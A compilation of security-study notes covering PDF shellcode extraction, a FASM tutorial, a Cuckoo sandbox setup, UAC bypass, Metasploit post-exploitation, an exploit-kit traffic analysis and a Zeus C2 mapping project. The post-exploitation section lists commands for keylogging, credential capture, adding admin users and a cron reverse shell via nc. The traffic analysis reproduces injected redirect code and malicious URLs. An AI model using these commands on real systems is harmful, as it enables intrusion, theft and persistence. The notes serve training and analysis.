Extracting Malicious Shellcode From PDF

Source: OpenSecurityTraining

  1. PDFStreamDumper
  2. Load -> Pdf File
  3. View objects list in left-side box
    • Tools -> About Listview Colors
  4. choose object of interest (click on it to select)
    • to export as-is: Right-click object number in left-side box -> Save Raw Stream
    • to deal with JavaScript…
      1. click on object in left-side box, to select it
      2. click Javascrip_UI (in the menubar)
      3. modify JavaScript so that you remove the exploit line(s) and just have a variable that contains the shellcode
      4. add to the end of the JavaScript box (replacing VAR_NAME): tb.writeFile(“C:\\shellcode.bin”,VAR_NAME)
      5. click the Run button

Debugging C Code in Microsoft Visual Studio 2015

Source: Intro to Intel  x86, OpenSecurityTraining
1 – Fix C++/ Linker Setup Properties
* Program Database (/Zi)
* Disable Security Check
* __cdecl (/Gd) or __stdcall (/Gz)
* Linker/Enable Incremental Linking (No)
2 – Breakpoint on Main -> Go to Disassembly
3 – Windows/Memory -> Address on ESP (hexadecimal display and 4-byte integers)
4 – Windows/Registers
Picture

Iczellion Tutorial 3 FASM Solution "Window Procedure"

format PE GUI 4.0
include ‘win32ax.inc’
entry start


section ‘.data’ data readable writable
 wHMain         dd ?
 wHInstance     dd ?
 wTitle         db ‘Tutorial 3.0’, 0
 wClsName       db ‘TUT3’, 0

 wMsg           MSG
 wCls           WNDCLASS

section ‘.code’ code readable executable
 start:
      ;; register the window class
      invoke GetModuleHandleA, NULL
      mov [wHInstance], eax
      mov [wCls.hInstance], eax
      mov [wCls.style], CS_HREDRAW or CS_VREDRAW
      mov [wCls.lpfnWndProc], window_procedure
      mov [wCls.lpszClassName], wClsName
      mov [wCls.hbrBackground], COLOR_WINDOW+1
      invoke LoadIcon, NULL, IDI_APPLICATION
      mov [wCls.hIcon], eax
      invoke LoadCursor, NULL, IDC_ARROW
      mov [wCls.hCursor], eax
      invoke RegisterClass, wCls

     ;; create the main window
     invoke CreateWindowEx,\
            0,\
            wClsName,\
            wTitle,\
            WS_OVERLAPPEDWINDOW,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            NULL,\
            NULL,\
            [wHInstance],\
            NULL
     mov [wHMain], eax
     invoke ShowWindow, [wHMain], SW_SHOW

     ;; entering the message loop
     window_message_loop_start:
        invoke GetMessage, wMsg, NULL, 0, 0
        or eax, eax
        je window_message_loop_end
        invoke TranslateMessage, wMsg
        invoke DispatchMessage, wMsg
        jmp window_message_loop_start

     window_message_loop_end:
        invoke ExitProcess, 0

    ;; window_procedure
    proc window_procedure, hWnd, uMsg, wParam, lParam
         push ebx esi edi
         cmp [uMsg], WM_DESTROY
         je wmDESTROY

         wmDEFAULT:
                invoke DefWindowProc, [hWnd], [uMsg], [wParam], [lParam]
                jmp wmBYE

        wmDESTROY:
                invoke PostQuitMessage, 0

        wmBYE:
                pop edi esi ebx
                ret
    endp
section ‘.idata’ import data readable writable
library kernel32, ‘kernel32.dll’,\
        user32, ‘user32.dll’

import  kernel32,\
        GetModuleHandleA, ‘GetModuleHandleA’,\
        ExitProcess, ‘ExitProcess’

import  user32,\
        RegisterClass, ‘RegisterClassA’,\
        CreateWindowEx, ‘CreateWindowExA’,\
        DefWindowProc, ‘DefWindowProcA’,\
        ShowWindow, ‘ShowWindow’,\
        LoadCursor, ‘LoadCursorA’,\
        LoadIcon, ‘LoadIconA’,\
        GetMessage, ‘GetMessageA’,\
        TranslateMessage, ‘TranslateMessage’,\
        DispatchMessage, ‘DispatchMessageA’,\
        PostQuitMessage, ‘PostQuitMessage’












Installing Cuckoo Sandbox on Mac OS

Source: https://github.com/blacktop/docker-cuckoo

Thanks to Blacktop for the tip!
curl -sL https://github.com/blacktop/docker-cuckoo/raw/master/docker-compose.yml > docker-compose.yml
$ docker-compose up -d
# Cuckoo API is listening on port 8000 now.
$ curl $(docker-machine ip):8000/cuckoo/status


Useful Commands:

$ docker run -d --name mongo mongo
$ docker run -d --name postgres -e POSTGRES_PASSWORD=cuckoo postgres
$ docker run -d --name elasticsearch elasticsearch
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
--link postgres \
-p 8000:1337 \
blacktop/cuckoo api
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
--link mongo \
--link elasticsearch \
-p 80:31337 \
blacktop/cuckoo web
docker run blacktop/cuckoo daemon       # start cuckoo.py
docker run blacktop/cuckoo submit # run utils/submit.py
docker run blacktop/cuckoo process # run utils/process.py
docker run blacktop/cuckoo api # starts RESTFull API
docker run blacktop/cuckoo web # starts web UI
docker run blacktop/cuckoo distributed # runs distributed/app.py
docker run blacktop/cuckoo stats # utils/stats.py
docker run blacktop/cuckoo help # runs cuckoo.py --help

User Account Control Bypass

Source: http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
Goal: Advance knowledge surrounding User Account Control (UAC) bypass techniques.

​Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009, it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version:

CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8

2.  Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. 

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:


Advanced Penetration Testing: Post-Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary


(1) Metasploit Scripts:

msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf >use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

(7) Local Information Gathering: Searching for Files
meterpreter > search -f *password*

(8) Local Information Gathering: Gathering Passwords
usr/share/metasploit-framework/modules/post/ windows/gather/credentials

(9) Local Information Gathering: Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

(10) Lateral Movement: PSExec
msf > use exploit/windows/smb/psexec

(11) Lateral Movement: Pass the Hash
Replace password with the LM:NTLM hash from hashdump
We are still able to authenticate using Psexec

(12) Lateral Movement:Token Impersonation
load incognito
list tokens –u

(13) Lateral Movement: SMB Capture
Set up SMB capture server in Metasploit
Drop into a shell in a session with an impersonated token

(14) Pivoting through Metasploit
route add 172.16.85.0 255.255.255.0 2
Routes traffic to 172.16.85.0/24 network through session 2

(15) Pivoting with socks4a and proxychains
use auxiliary/server/socks4a
Edit /etc/proxychains.conf change port to 1080
proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190

(16) NBNS Spoofing
Listen for NBNS requests and respond accordingly, can get machines to send hashes or possibly even plaintext
​msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.20.9
msf auxiliary(nbns_response) > exploit
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb
msf auxiliary(http_ntlm) > exploit
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /root/httplog
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > exploit

(17) Responder
Automates NBNS spoofing attacks
cd Responder
python Responder.py –i 192.168.20.9

(A) Persistence: Adding a User
net user john johnspassword /add /domain
net localgroup administrators john /add /domain
Add /domain at the end to add the user to a domain as well

(B) Persistence: With Metasploit Script​
Metasploit persistence script creates an autorun entry in the registry. Not stealthy (writes to a disk)
run persistence -r 192.168.20.9 -p 2345 -U

(C) Persistence: Crontabs
Add to /etc/crontab file
*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash

service cron restart

ElTest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

​The infection method is as follows:

  • www[.]tdca[.]ca – Compromised site
  • mapobifi[.]xyz – 85.93.0.110 port 80 – EITest gate
  •  ew[.]203kcontractorsarkansas[.]com – 109.234.36.220 port 80 –  Rig EK
  • 109.236.87.204 – GET /default.jpg – Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 – POST /yyy/fers.php – Post-infection traffic caused by the Bandarchor ransomware

*Analyze PCAP using filter “http.request”

Relevant Additional Analysis:

  1. Get / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. Get HTTP request to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
  3. Get HTTP request to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)​ 
  4. GET HTTP request to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)


  1. Following TCP stream of the get request to 207.182.128.162 (length: 523 bytes) reveals Flash movie value and the embedded source with “allowScriptAccess” as hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile from the website hxxp://www.tdca[.]ca.

The full injected source code to the compromised website is as follows:
 

 

<param name="allowScriptAccess" value="always“/><param name="movie” value=”hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/”/>

  

  1. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile for the shockwave file with the header “CWS.” (referrer: hxxp://tdca.ca)

GET 
/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. Using JavaScript, redirects the user to 
‘hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE’ using JavaScript (size? Type?) 
The full source code is as follows:
 







FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB

document.location.href = “hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE”;

geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ


 
4. GET 
hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. Same request but to GET index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET to /default.jpg and POST to /yyy/fers[.]php 109.236.87.204 

The full script as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
defaultPOST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache

ZeusC2Tracker: Location Analyzer Using GeoCode API

Goal: ​Obtain geographical location coordinates of current and historical Zeus servers and visualize them on the Google Map.

Data Source:
(1) zeustracker.abuse.ch
(2) cybercrime-tracker.net

Language: Python, Regular Expressions, SQLite, JavaScript, HTML
APIGoogle Maps Geocoding API, IP-API JSON API, plotly

                         We see the largest number of ZeusC2 in the first quarter of 2015.


*Creates a SQL table with 2,690 Zeus Command-and-Control servers and visualizes the database via Google Maps Geocoding API.
Method of Operation:
*Creates SQL database “ZeusC2Tracker.sqlite” with columns mdate, url, ip, rtype, rsource;
*Converts Zeus hostnames to cities using ip-api.com JSON API;
*Obtains lat/long values using GeoCode API, and stores values in another SQL database “geodata.sqlite”;
*Maps the data from “geodata.sqlite” to Javascript file “where.js”;
*Creates viewable Google-mapped values in “where.html” that point to “where.js”.

Usage:
1) Run Zeusloader.py to create monolithic “ZeusC2Tracker.sqlite” database with columns mdate, url, ip, rtype, rsource;

(2) Run ZeusHostConverter.py to convert hostnames to cities using /ip-api.com JSON API and post data to new”where.data” file;
(3) Run Geoload.py to parse “where.data”, obtain lat/long values using GeoCode API, and store values in SQL  database “geodata.sqlite”;
(4) Run Geodump.py to map the data from “geodata.sqlite” to new Javascript file “where.js”; and
(5) View the Google-mapped values in “where.html” that point to “where.js”.

Example of SQL query “SELECT * From ZeusC2Tracker;”

Here are some interesting findings based on this SQL ZeusC2Tracker database of  2,690 ZeusC2’s:


(1) We have 90 .ru [Russian] domains associated with ZeusC2’s.
(2) We have 6 domains that contain string “bank” associated with ZeusC2’s.
(3) We have 1,442 default Zeus installs associated with ZeusC2. They are identified by default control panel path “/cp.php?m=login“.
(4) We have 16 TOR [onion] domains associated with ZeusC2’s.
(5) We have 1,092 .com domains associated with ZeusC2’s.
(6) We have 35 .ua [Ukrainian] domains associated with ZeusC2’s.
(7) We have 5 .cc [Cocos (Keeling) Islands – often used by carding community] domains associated with ZeusC2’s.
(8) We have 28 .su [Soviet Union] domains associated with ZeusC2’s.
(9) We have 2 .gov [1 – Colombian, 1- Turkish] domains associated with ZeusC2’s.

(10) We have 3 most popular IPs 199.192.231.250 [26 domains], 198.1.80.203 [21 domains], 162.144.127.104 [16 domains] associated with with ZeusC2’s.

In [2]:
import sqlite3
import pandas as pd
import plotly.plotly as py # interactive graphing
from plotly.graph_objs import Bar, Scatter, Marker, Layout
In [3]:
conn = sqlite3.connect('ZeusC2Tracker.sqlite')
In [3]:
df = pd.read_sql_query('SELECT * FROM ZeusC2Tracker', conn)
In [12]:
print df
        id       mdate                                                url  \
0 1 14-01-2016 www.proacti.com.br/bosco/cp.php?m=login
1 2 14-01-2016 www.manju.co.in/wp/wp-includes/js/crop/cropper...
2 3 10-01-2016 diagnosticdubai.com/UCHE/cp.php?m=login
3 4 08-01-2016 bannersbrasil.com.br/mum/cp.php?m=login
4 5 08-01-2016 siliverstersnewone.in/html/cp.php?m=login
5 6 06-01-2016 ozowarac.com/jj/cp.php?m=login
6 7 06-01-2016 ozowarac.com/ff/cp.php?m=login
7 8 06-01-2016 ozowarac.com/me/cp.php?m=login
8 9 06-01-2016 www.bawtrycarbons.com/pin/somzy/admin.php?lett...
9 10 04-01-2016 www.cennoworld.com/ur/cp.php?m=login
10 11 03-01-2016 www.dphcustompins.com/staging/skin/frontend/de...
11 12 03-01-2016 yalitest3.info/be4/a.php?m=login
12 13 22-12-2015 allterrainadventures.co.uk/media/css/panel/cp....
13 14 22-12-2015 vrglongthanh.com.vn/kuzole/30/cp.php?letter=login
14 15 16-12-2015 want-to-buy.co.uk/wp-includes/pomo/.mysql/ssl/...
15 16 11-12-2015 studio020.com/anims/admin/admin/spirit.php?let...
16 17 11-12-2015 ebenezerfm.com/wp-content/uploads/2012/cp.php?...
17 18 11-12-2015 mat-update.be/bulletprove-gameover/cp.php?m=login
18 19 10-12-2015 mediacomholdings.com/sql/rim/cp.php?m=login
19 20 07-12-2015 prodsamps.pw/mavlad/panel/cp.php?letter=login
20 21 07-12-2015 prodsamps.pw/shile/panel/cp.php?letter=login
21 22 04-12-2015 beemasewakendra.com/slide/js/.cache/ssl/.cphor...
22 23 04-12-2015 studentscompanion.in/reservation/img/products/...
23 24 04-12-2015 2becomputers.com/conta/cp.php?m=login
24 25 04-12-2015 saner.com.au/blog/server/cp.php?m=login
25 26 04-12-2015 cheshamfrench.co.uk/martins/server/cp.php?m=login
26 27 29-11-2015 91.236.213.74/pictures/standard.php?m=login
27 28 28-11-2015 192.99.99.251:6500/a/data.php?m=login
28 29 28-11-2015 satyamsng.com/xres/css/.mode/home/u.php?m=login
29 30 28-11-2015 omnienergy.com.au/file/cp.php?m=login
... ... ... ...
2660 2661 2013-07-25 103.7.59.135
2661 2662 2013-07-20 reserve.jumpingcrab.com
2662 2663 2013-07-19 www.witkey.com
2663 2664 2013-07-18 lonsmemorials.com
2664 2665 2013-07-13 google.poultrymiddleeast.com
2665 2666 2013-07-08 ice.ip64.net
2666 2667 2013-06-24 igor32.herbalbrasil.com.br
2667 2668 2013-06-16 gate.timstackleshop.es
2668 2669 2013-06-15 projects.globaltronics.net
2669 2670 2013-06-13 jgworldupd.com
2670 2671 2013-06-10 porschecosv.com
2671 2672 2013-06-08 64.85.233.8
2672 2673 2013-05-28 bbwscimanuk.pdsda.net
2673 2674 2013-05-26 dattinggate.com
2674 2675 2013-05-22 199.7.234.100
2675 2676 2013-05-16 109.229.36.65
2676 2677 2013-05-10 190.15.192.25
2677 2678 2013-04-25 www.group-billarclub.com
2678 2679 2013-04-09 illinoisnets.net
2679 2680 2013-03-28 128.210.157.251
2680 2681 2013-03-21 visit2013.in.ua
2681 2682 2013-01-23 jangasm.org
2682 2683 2013-01-07 serversss.biz
2683 2684 2012-12-10 counter-1.adscounter.com.ua
2684 2685 2012-12-03 83.15.254.242
2685 2686 2012-11-01 diosdelared.com.mx
2686 2687 2012-10-12 hruner.com
2687 2688 2012-10-12 dasch.pl
2688 2689 2012-10-09 allfortune777.biz
2689 2690 2012-08-25 64.127.71.73

ip rtype rsource
0 186.202.127.118 Zeus CyberCrimeTracker.net
1 198.1.74.28 Zeus CyberCrimeTracker.net
2 216.158.236.124 Zeus CyberCrimeTracker.net
3 186.202.127.118 Zeus CyberCrimeTracker.net
4 162.214.5.117 Zeus CyberCrimeTracker.net
5 198.105.221.5 Zeus CyberCrimeTracker.net
6 198.105.221.5 Zeus CyberCrimeTracker.net
7 198.105.221.5 Zeus CyberCrimeTracker.net
8 108.167.131.34 Zeus CyberCrimeTracker.net
9 198.105.221.5 Zeus CyberCrimeTracker.net
10 23.229.238.21 Zeus CyberCrimeTracker.net
11 74.117.183.206 Zeus CyberCrimeTracker.net
12 185.116.212.119 Zeus CyberCrimeTracker.net
13 112.213.89.101 Zeus CyberCrimeTracker.net
14 185.24.98.175 Zeus CyberCrimeTracker.net
15 83.98.177.7 Zeus CyberCrimeTracker.net
16 69.4.233.96 Zeus CyberCrimeTracker.net
17 198.105.221.5 Zeus CyberCrimeTracker.net
18 129.232.131.10 Zeus CyberCrimeTracker.net
19 158.255.6.112 Zeus CyberCrimeTracker.net
20 158.255.6.112 Zeus CyberCrimeTracker.net
21 184.95.41.121 Zeus CyberCrimeTracker.net
22 184.95.41.121 Zeus CyberCrimeTracker.net
23 198.50.98.253 Zeus CyberCrimeTracker.net
24 27.121.64.74 Zeus CyberCrimeTracker.net
25 69.28.199.60 Zeus CyberCrimeTracker.net
26 Zeus CyberCrimeTracker.net
27 Zeus CyberCrimeTracker.net
28 184.95.41.121 Zeus CyberCrimeTracker.net
29 27.121.64.198 Zeus CyberCrimeTracker.net
... ... ... ...
2660 199.7.234.100 ZeuS ZeusTracker.ch
2661 109.229.36.65 Citadel ZeusTracker.ch
2662 190.15.192.25 Citadel ZeusTracker.ch
2663 Citadel ZeusTracker.ch
2664 Citadel ZeusTracker.ch
2665 128.210.157.251 Ice', 'IX ZeusTracker.ch
2666 ZeuS ZeusTracker.ch
2667 Citadel ZeusTracker.ch
2668 Ice', 'IX ZeusTracker.ch
2669 Citadel ZeusTracker.ch
2670 83.15.254.242 ZeuS ZeusTracker.ch
2671 Citadel ZeusTracker.ch
2672 107.163.174.74 Citadel ZeusTracker.ch
2673 Citadel ZeusTracker.ch
2674 ZeuS ZeusTracker.ch
2675 64.127.71.73 ZeuS ZeusTracker.ch
2676 87.254.167.37 ZeuS ZeusTracker.ch
2677 94.103.36.55 ZeusTracker.ch
2678 60.13.186.5 ZeuS ZeusTracker.ch
2679 203.170.193.23 ZeuS ZeusTracker.ch
2680 188.247.135.99 ZeuS ZeusTracker.ch
2681 188.247.135.53 ZeuS ZeusTracker.ch
2682 188.247.135.74 ZeuS ZeusTracker.ch
2683 216.176.100.240 Ice', 'IX ZeusTracker.ch
2684 151.97.190.239 ZeuS ZeusTracker.ch
2685 188.247.135.58 ZeuS ZeusTracker.ch
2686 188.219.154.228 Citadel ZeusTracker.ch
2687 216.215.112.149 Ice', 'IX ZeusTracker.ch
2688 210.211.108.215 ZeuS ZeusTracker.ch
2689 109.127.8.242 ZeuS ZeusTracker.ch

[2690 rows x 6 columns]
In [15]:
df = pd.read_sql_query("SELECT mdate, COUNT(*) as 'num_of_ZeusC2' FROM ZeusC2Tracker GROUP BY mdate ORDER BY 'num_of_ZeusC2'", conn)
py.iplot([Bar(x=df.mdate, y=df.num_of_ZeusC2)], filename='Number of ZeusC2 by mdate')
In [20]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_RuZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.ru%' GROUP BY url ORDER BY 'num_of_RuZeusC2'", conn)
In [21]:
print df
                                                  url  num_of_RuZeusC2
0 actualmove.ru/images/terrymax/1/cp.php?m=login 1
1 aflar.ru/images/home/ppns/cp.php?letter=login 1
2 aflar.ru/images/major/kraftz/cp.php?letter=login 1
3 alaska2russia.ru/kraftz/major/cp.php?letter=login 1
4 almazdental.ru/wp-includes/pomo/panel/cp.php?m... 1
5 atmape.ru 1
6 baims.ru/lk/feeds/site/cp.php?m=login 1
7 bbumn.ru/fire/cart.php?m=login 1
8 bbumn.ru/nico/cp.php?m=login 1
9 bitcoin-send.ru/geobase/cp.php?m=login 1
10 blesslifelove.ru 1
11 bqtest2.ru 1
12 brr-21.ru.shn-host.ru/cp.php?m=login 1
13 cd31411.tmweb.ru 1
14 cogoda.ru/biZHubb/admin.php?m=login 1
15 danbeta.ru/g1/cp.php?m=login 1
16 danbeta.ru/g2/cp.php?m=login 1
17 danbeta.ru/g3/cp.php?m=login 1
18 danbeta.ru/g4/cp.php?m=login 1
19 danbeta.ru/g5/cp.php?m=login 1
20 dileconme.hotmail.ru 1
21 dozybrown.ru/osi1/30/cp.php?letter=login 1
22 eddw.ru/144/cp.php?m=login 1
23 endnra.ru/logs/cart.php?m=login 1
24 fitytrade.ru/diff1/cp.php?m=login 1
25 fx45.pp.ru 1
26 genmjob3.ru 1
27 geopryce.ru 1
28 goa-inf.ru/php/admin.php?m=login 1
29 gyodundena.hotmail.ru 1
.. ... ...
60 sp4m.ru/09/nd3/cp.php?m=login 1
61 sp4m.ru/09/seb/cp.php?m=login 1
62 sp4m.ru/1/cp.php?m=login 1
63 sp4m.ru/11/cp.php?m=login 1
64 sp4m.ru/111/cp.php?m=login 1
65 sp4m.ru/1111/cp.php?m=login 1
66 sp4m.ru/5/cp.php?m=login 1
67 sp4m.ru/55/cp.php?m=login 1
68 sp4m.ru/555/cp.php?m=login 1
69 sp4m.ru/5555/cp.php?m=login 1
70 sp4m.ru/css/cp.php?m=login 1
71 sp4m.ru/fem/cp.php?m=login 1
72 sp4m.ru/js/cp.php?m=login 1
73 tosyisha.ru/ub02/cp.php?m=login 1
74 u0003321.cp.regruhosting.ru 1
75 ulogroup.ru/wp-server/admin/cp.php?m=login 1
76 uralviolet.ru/img/bin/ben/server/install/ 1
77 viose.ru/images/major/kraftz/cp.php?letter=login 1
78 vz81757.eurodir.ru/gennadaok/cp.php?m=login 1
79 warfacebest.ru.swtest.ru/cp.php?m=login 1
80 www.changeexchange2.ru 1
81 www.eroconlia.ru/files/30/cp.php?letter=login 1
82 www.luxkupe.ru/install/ 1
83 www.ruyacafe.net/wppress/fac/cp.php?m=login 1
84 www.ruyacafe.net/wppress/udok/cp.php?m=login 1
85 www.tvergeneration.ru/photo/indexx.php?letter=... 1
86 www.zvenigorodskoe.ru/js/cp.php?m=login 1
87 ya-aaaa123123.myjino.ru 1
88 zabava-bel.ru 1
89 zhyravlik.ru 1

[90 rows x 2 columns]
In [23]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Bank_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%bank%' GROUP BY url ORDER BY 'num_of_Bank_ZeusC2'", conn)
print df
                                                 url  num_of_Bank_ZeusC2
0 centraltransbankonlinetrans.org/panel2/cp.php?... 1
1 evobank.co 1
2 goalgetterssa.in/banks/cp.php?m=login 1
3 syndlcatebank.co.in/6/serverphp/cp.php?m=login 1
4 ua-banki.com/images/cp.php?m=login 1
5 www.cbankng.info/11/admin/1/metro11/admin/1/cp... 1
6 zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c... 1
In [32]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_default_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%cp.php?m=login%' GROUP BY url ORDER BY 'num_of_default_ZeusC2'", conn)
In [33]:
print df
                                                    url  num_of_default_ZeusC2
0 03a6b7a.netsolhost.com/order/server/cp.php?m=l... 1
1 03a6f57.netsolhost.com/shoes/cp.php?m=login 1
2 03bbec4.netsolhost.com/udo/cp.php?m=login 1
3 103.26.128.84/botnet/1/cp.php?m=login 1
4 104.166.67.26/~ctrrosan/wp/wp-admin/jss/cp.php... 1
5 104.192.103.94/forever/helps/cp.php?m=login 1
6 104.237.194.158/appy/panel/cp.php?m=login 1
7 107.182.135.23/brew/cp.php?m=login 1
8 107.182.142.41/serverphp/r7/cp.php?m=login 1
9 108.175.156.136/~stats/images/css/cp.php?m=login 1
10 109.169.92.40/.sh/cp.php?m=login 1
11 109.200.196.187/~mar23/admmm/cp.php?m=login 1
12 109.200.196.187/~mar23/wc/cp.php?m=login 1
13 116.0.23.234/~opt25643/swf/.base/cp.php?m=login 1
14 116.193.77.118/~bee20734/vex/cp.php?m=login 1
15 142.0.36.226/office/badoo/server/cp.php?m=login 1
16 142.0.36.226/office/blarry/server/cp.php?m=login 1
17 142.0.36.226/office/david/server/cp.php?m=login 1
18 142.0.36.226/office/ebony/server/cp.php?m=login 1
19 142.0.36.226/office/isiaka/server/cp.php?m=login 1
20 142.0.36.226/office/nassy/server/cp.php?m=login 1
21 142.0.78.144/xampp/greenslide/mafia/cp.php?m=l... 1
22 142.0.78.145/xampp/bluemagic/magicsystem/cp.ph... 1
23 146.0.36.43/cp.php?m=login 1
24 149.154.64.20/files/cp.php?m=login 1
25 162.144.3.101/~aussawin/zzz/cp.php?m=login 1
26 167.88.15.203/henrybellon/cp.php?m=login 1
27 167.88.15.203/old/cp.php?m=login 1
28 173.0.51.45/~allhailh/ahm/cp.php?m=login 1
29 173.243.112.220/xampp/beright/moneypanel/cp.ph... 1
... ... ...
1412 yamleg.fu8.com/acho/cp.php?m=login 1
1413 yamleg.fu8.com/dan/cp.php?m=login 1
1414 yamleg.fu8.com/em/cp.php?m=login 1
1415 yamleg.fu8.com/ik/cp.php?m=login 1
1416 yamleg.fu8.com/xx/cp.php?m=login 1
1417 yapanyapi.com/katolog/thumbs/panel/cp.php?m=login 1
1418 yilinmilletvekili.com/Blast/serverphp/cp.php?m... 1
1419 yogicmanagement.com/wp-admin/jss/cp.php?m=login 1
1420 youronlinecasinobonuses.com/k/cp.php?m=login 1
1421 yumcsupply.com/st/cp.php?m=login 1
1422 yysopqde.com/panel/Panel/cp.php?m=login 1
1423 z3us1.z-ed.info/z3us_kwksdlfklw/cp.php?m=login 1
1424 zapata1.co.uk/jojo/serverphp/cp.php?m=login 1
